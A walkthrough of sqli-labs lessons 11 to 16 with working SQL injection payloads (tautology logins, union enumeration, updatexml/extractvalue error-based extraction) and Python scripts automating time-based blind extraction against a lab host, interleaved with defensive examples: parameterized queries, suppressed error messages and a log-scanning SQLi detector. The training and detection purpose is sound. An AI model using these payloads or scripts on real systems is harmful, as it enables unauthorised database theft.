sqli-labs(3)

11.

The page shows a login form, so the first test is or 1=1 in the input.

HackBar shows that the data here is sent by POST. In a GET request we would comment out the rest of the query with --+: a # in the URL is interpreted by the browser as the fragment marker and never reaches the server, so -- supplies the comment and + the trailing space it needs. Since this is a POST body, # can be used directly.

From here on it works the same as the GET version.

1' order by 2 #

order by 3 gives an error, so the query returns two columns.

Union-based injection

1' union select 1,2 #

1' union select database(),2#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1' union select 1,group_concat(username) from security.users #
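Before moving on to the next lesson, here is the defensive counterpart to these payloads, added as an example that is not part of the original post or of sqli-labs. It builds a small SQLite stand-in for the security.users table (constructed rows, not the lab's data; the username/password columns are assumed from the payloads above) and runs the same inputs through a string-concatenated login query and a parameterized one. SQLite only knows the -- comment, not MySQL's #, so the payloads here end in -- instead.

```python
import sqlite3

# Constructed sample rows standing in for the lab's security.users table; the real
# table is not reproduced here (assumption: text columns username and password).
SAMPLE_USERS = [("alice", "wonderland"), ("bob", "builder")]


def make_db():
    """In-memory SQLite database shaped like the lab's users table (constructed sample)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_unsafe(conn, uname, passwd):
    """Vulnerable pattern: input is spliced into the SQL text, so a quote in the input
    closes the literal and everything after it (or / union / comment) is parsed as SQL."""
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{uname}' AND password='{passwd}' LIMIT 1")
    return conn.execute(sql).fetchone()


def login_safe(conn, uname, passwd):
    """Hardened form: the SQL text is a constant and the driver binds the values, so the
    input can never change the structure of the statement, whatever quoting it contains."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1"
    return conn.execute(sql, (uname, passwd)).fetchone()


def compare(uname, passwd):
    """Run the same input through both versions; returns (unsafe_row, safe_row)."""
    conn = make_db()
    return login_unsafe(conn, uname, passwd), login_safe(conn, uname, passwd)


if __name__ == "__main__":
    # SQLite only understands the -- comment, not MySQL's #, so the lab payloads are
    # written with -- here; the shape is otherwise the one used above.
    for uname in ["alice", "1' or 1=1 -- ", "1' union select 'x','y' -- "]:
        unsafe, safe = compare(uname, "wonderland" if uname == "alice" else "wrong")
        print(f"{uname!r:40} unsafe={unsafe} safe={safe}")
```

With the concatenated query the tautology returns the first user and the union payload returns the attacker-chosen row, exactly as in the lesson; with bound parameters both inputs are just strings that match no username, and the closing context (' here, ") or ') in the later lessons) stops mattering, because there is no string to close.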

12.

1' produces no reaction, so try 1" instead.

The error message produced by 1" shows that a closing ) is also needed.

1") or 1=1 #

The rest is the same as before.

1") union select 1,2 #

1") union select 1,database() #

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1") union select 1,group_concat(username) from security.users #

13.

Trying 1' gives an error message that shows the closing context is ').

The login succeeds, but nothing from the query is displayed; since error messages are shown, error-based injection is used. Two error-based techniques are shown here, extractvalue() and updatexml().

1') and extractvalue(1,concat(0x5c,database()))#

1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

Extracting the table names:

1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1') and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) #

Extracting the column names:

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1') and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

Extracting the data:

1') and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)#
1') and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

14.

Testing the input fields shows that 1" or 1=1 # logs in successfully.

Using error-based injection:

1" and updatexml(1,concat(0x7e,database(),0x7e),1)#
1" and extractvalue(1,concat(0x5c,database()))#

This gives the database name.

1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

This gives the table names.

1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

This gives the column names.

1" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#
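Lessons 12 to 14 all depend on one thing: the database error text is written into the HTTP response. The example below, added here and not taken from the post or from sqli-labs, shows the two ways a login handler can treat that error. It uses a tiny SQLite stand-in (constructed rows) and a string-built query whose parenthesised quoting is assumed from the 1') closing the lesson describes; the page does not show the real backend SQL. The query is left vulnerable on purpose so that the same probe reaches the parser in both handlers; only the error handling differs.

```python
import logging
import sqlite3
import uuid

log = logging.getLogger("login")

GENERIC_MESSAGE = "Login failed"


def make_db():
    """Minimal stand-in for the lab's users table (constructed sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'wonderland')")
    return conn


def lab_style_query(uname, passwd):
    """String-built query in the shape the lesson-13 payloads imply (assumption: the
    page does not show the backend SQL). Kept deliberately vulnerable so that malformed
    input reaches the parser; the point of this example is the error handling below."""
    return ("SELECT username, password FROM users "
            f"WHERE username=('{uname}') AND password=('{passwd}') LIMIT 1")


def login_leaky(conn, uname, passwd):
    """Echoes the raw database error to the client. This is the channel error-based
    injection reads from: the message reveals the quoting context and, on MySQL, carries
    whatever text updatexml()/extractvalue() were asked to evaluate."""
    try:
        return {"ok": True, "row": conn.execute(lab_style_query(uname, passwd)).fetchone()}
    except sqlite3.Error as exc:
        return {"ok": False, "error": f"{type(exc).__name__}: {exc}"}


def login_hardened(conn, uname, passwd):
    """Same query, but the error text stays server-side: it is logged under a reference id
    and the client only sees a generic message plus the id for support lookups."""
    try:
        return {"ok": True, "row": conn.execute(lab_style_query(uname, passwd)).fetchone()}
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:12]
        log.error("login query failed ref=%s type=%s detail=%s", ref, type(exc).__name__, exc)
        return {"ok": False, "error": GENERIC_MESSAGE, "ref": ref}


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    conn = make_db()
    # 1') is the probe used above to learn the closing context; compare what each handler returns.
    print(login_leaky(conn, "1')", "x"))
    print(login_hardened(conn, "1')", "x"))
```

Hiding the error only removes the error-based channel; the next lesson shows the attack continuing as blind injection against a page that prints no errors at all. Parameterized queries remain the actual fix, and the reference id in the log is what lets the operations team correlate a user complaint with the stored detail.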

15.

1' or 1=1# returns a successful login.

Here, if the input is wrong, the page only returns a failed login and shows no error message, so we use boolean-based blind injection.

Here we need to know the difference between and and or: with and, both sides must be true for the row to match; with or, one true side is enough. If we have not yet enumerated users and admin is not actually in the username column, only the or form works. From experience, the first field of the login form is the one that fills in username.

admin' and (substr(database(),1,1)='s')#
1' or (substr(database(),1,1)='s')#

1' or (substr(database(),1,1)='a')#

Here success and failure only return different images, which gives a script nothing obvious to match on, so the script uses sleep() instead, i.e. time-based blind injection.

import requests, time

def database():
    data_base = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = {"uname": f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#", "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_stime = time.time()
            rsp_time = end_stime - start_time
            # print(f"elapsed: {rsp_time}")
            if rsp_time > 2:  # a 2 s delay means this character is correct
                data_base += char
                print(f"数据库名为:{data_base}")
                break
        else:  # no character matched: the name is complete
            break
    return data_base

datas = database()
print(f"最终数据库名为:{datas}")
1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

import requests, time

def tablename():
    table_name = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = {"uname": f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#", "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_stime = time.time()
            rsp_time = end_stime - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                table_name += char
                print(f"表名为:{table_name}")
                break
        else:  # no character matched: the name is complete
            break
    return table_name

tables = tablename()
print(f"最终表名为:{tables}")

1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

import requests, time

def columnname():
    column_name = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = {"uname": f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#", "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                column_name += char
                print(f"列名为:{column_name}")
                break
        else:  # no character matched: the name is complete
            break
    return column_name

columns = columnname()
print(f"最终列名为:{columns}")
1' or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

import requests, time

def data():
    data = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = {"uname": f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#", "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                data += char
                print(f"数据为:{data}")
                break
        else:  # no character matched: the value is complete
            break
    return data

datadata = data()
print(f"最终数据为:{datadata}")

16.

Testing shows that 1" or 1=1 # logs in successfully.

1") or if(substr(database(),1,1)='s',sleep(5),0 )#

import requests, time

def dataname():
    data_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {"uname": f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#', "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                data_name += char
                print(f"数据库为:{data_name}")
                break
        else:  # no character matched: the name is complete
            break
    return data_name

datas = dataname()
print(f"最终数据名为:{datas}")

1") or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

import requests, time

def tablename():
    table_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {"uname": f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#', "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                table_name += char
                print(f"表名为:{table_name}")
                break
        else:  # no character matched: the name is complete
            break
    return table_name

tables = tablename()
print(f"最终表名为:{tables}")

1") or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

import requests, time

def columnname():
    column_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {"uname": f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#', "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                column_name += char
                print(f"字段名为:{column_name}")
                break
        else:  # no character matched: the name is complete
            break
    return column_name

columns = columnname()
print(f"最终字段名为:{columns}")

1") or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

import requests, time

def data():
    data = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {"uname": f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#', "passwd": "123456"}
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:  # a 2 s delay means this character is correct
                data += char
                print(f"数据为:{data}")
                break
        else:  # no character matched: the value is complete
            break
    return data

datas = data()
print(f"最终数据为:{datas}")

Final script

import requests, time

URL = "http://192.168.1.200:86/Less-16/"
CHART = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"

def extract(expr, label):
    # Consolidates the four functions above into one: `expr` is the SQL expression whose
    # value is guessed one character at a time; a response slower than 2 s means the
    # guessed character is correct (same payloads and threshold as above).
    result = ""
    while True:
        for char in CHART:
            payload = {
                "uname": f'1") or if(substr({expr},{len(result) + 1},1)="{char}",sleep(2),0)#',
                "passwd": "123456",
            }
            start_time = time.time()
            requests.post(URL, data=payload)
            rsp_time = time.time() - start_time
            if rsp_time > 2:
                result += char
                print(f"{label}:{result}")
                break
        else:  # no character matched: the value is complete
            break
    return result

datas = extract("database()", "数据库为")
print(f"最终数据名为:{datas}")
tables = extract('(select table_name from information_schema.tables where table_schema="security" limit 0,1)', "表名为")
print(f"最终表名为:{tables}")
columns = extract('(select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1)', "字段名为")
print(f"最终字段名为:{columns}")
datas = extract("(select username from security.users limit 0,1)", "数据为")
print(f"最终数据为:{datas}")
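To close, a detection-side example, added here and not from the original post, that scans access-log lines for the payload families used in lessons 11 to 16: union/information_schema enumeration, the order by column probe, updatexml()/extractvalue() error-based probes, and if(...,sleep(2),0) time-based probes, which it also correlates with the recorded response time. Both the query string and the POST body are URL-decoded first, which is why the GET form (--+) and the POST form (# sent as %23) of the same payload look alike to the matcher. The log lines are constructed for this example: the combined-log layout with a trailing rt= response time and a body="..." field is an assumption, as are the IPs and timestamps; the Less-N paths reuse the page's names.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed log lines (not a real capture): combined log format plus the response
# time in seconds (rt=) and the form body (body="...") as the web server received it.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2023:10:01:02 +0800] "POST /Less-15/ HTTP/1.1" 200 1423 rt=0.012 body="uname=alice&passwd=wonderland&submit=Submit"
10.0.0.9 - - [12/Nov/2023:10:01:05 +0800] "POST /Less-11/ HTTP/1.1" 200 1511 rt=0.010 body="uname=1%27+union+select+1%2Cgroup_concat%28table_name%29+from+information_schema.tables+where+table_schema%3D%27security%27+%23&passwd=1"
10.0.0.9 - - [12/Nov/2023:10:01:09 +0800] "POST /Less-13/ HTTP/1.1" 200 1498 rt=0.011 body="uname=1%27%29+and+updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2C1%29%23&passwd=1"
10.0.0.9 - - [12/Nov/2023:10:01:14 +0800] "GET /index.php?id=1%27+order+by+3--+ HTTP/1.1" 500 612 rt=0.009 body=""
10.0.0.9 - - [12/Nov/2023:10:01:20 +0800] "POST /Less-15/ HTTP/1.1" 200 1423 rt=2.014 body="uname=1%27+or+if%28substr%28database%28%29%2C1%2C1%29%3D%27s%27%2Csleep%282%29%2C0%29%23&passwd=123456"
10.0.0.9 - - [12/Nov/2023:10:01:23 +0800] "POST /Less-15/ HTTP/1.1" 200 1423 rt=2.011 body="uname=1%27+or+if%28substr%28database%28%29%2C2%2C1%29%3D%27e%27%2Csleep%282%29%2C0%29%23&passwd=123456"
10.0.0.9 - - [12/Nov/2023:10:01:26 +0800] "POST /Less-15/ HTTP/1.1" 200 1423 rt=0.013 body="uname=1%27+or+if%28substr%28database%28%29%2C3%2C1%29%3D%27a%27%2Csleep%282%29%2C0%29%23&passwd=123456"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ rt=(?P<rt>[\d.]+) body="(?P<body>[^"]*)"$'
)

# Indicators taken from the payload shapes used in lessons 11 to 16 (matched on decoded, lowercased text).
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "error_based_xml": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "tautology": re.compile(r"\bor\s+1\s*=\s*1\b"),
    "quote_then_comment": re.compile(r"['\"]\)?\s*(#|--)"),
}


def decoded_inputs(target, body):
    """Attacker-controllable text after URL decoding: the query string and the form body.
    unquote_plus turns + into a space and %23 into #, so the GET (--+) and POST (#)
    spellings of a payload are compared in the same form."""
    parts = [unquote_plus(urlsplit(target).query), unquote_plus(body)]
    return " ".join(p for p in parts if p).lower()


def scan_line(line, slow_threshold=1.5):
    """Parse one log line; return an event dict, or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    text = decoded_inputs(m["target"], m["body"])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    rt = float(m["rt"])
    # A sleep() payload whose response really was slow is the strongest signal: the
    # injected condition evaluated true on the database server.
    if "time_based" in hits and rt >= slow_threshold:
        hits.append("slow_response_matches_sleep")
    return {"ip": m["ip"], "path": urlsplit(m["target"]).path, "rt": rt, "hits": hits}


def scan_log(text, slow_threshold=1.5):
    """Return only the requests that matched at least one indicator, in log order."""
    events = (scan_line(line, slow_threshold) for line in text.splitlines())
    return [e for e in events if e and e["hits"]]


def per_source(flagged):
    """Aggregate flagged requests by client IP. A character-by-character blind script
    shows up as a long run of flagged requests from one source, a fraction of them slow."""
    out = defaultdict(lambda: {"flagged": 0, "slow": 0})
    for e in flagged:
        out[e["ip"]]["flagged"] += 1
        if "slow_response_matches_sleep" in e["hits"]:
            out[e["ip"]]["slow"] += 1
    return dict(out)


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for e in flagged:
        print(f'{e["ip"]:10} {e["path"]:12} rt={e["rt"]:.3f} {",".join(e["hits"])}')
    print(per_source(flagged))
```

The slow-response threshold is deliberately below the 2 s the scripts above wait for, since network jitter makes the measured time land slightly on either side of the sleep value; the per-source counts are what turn six individually plausible requests into one obvious enumeration run.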

Source: http://www.mzph.cn/news/158204.shtml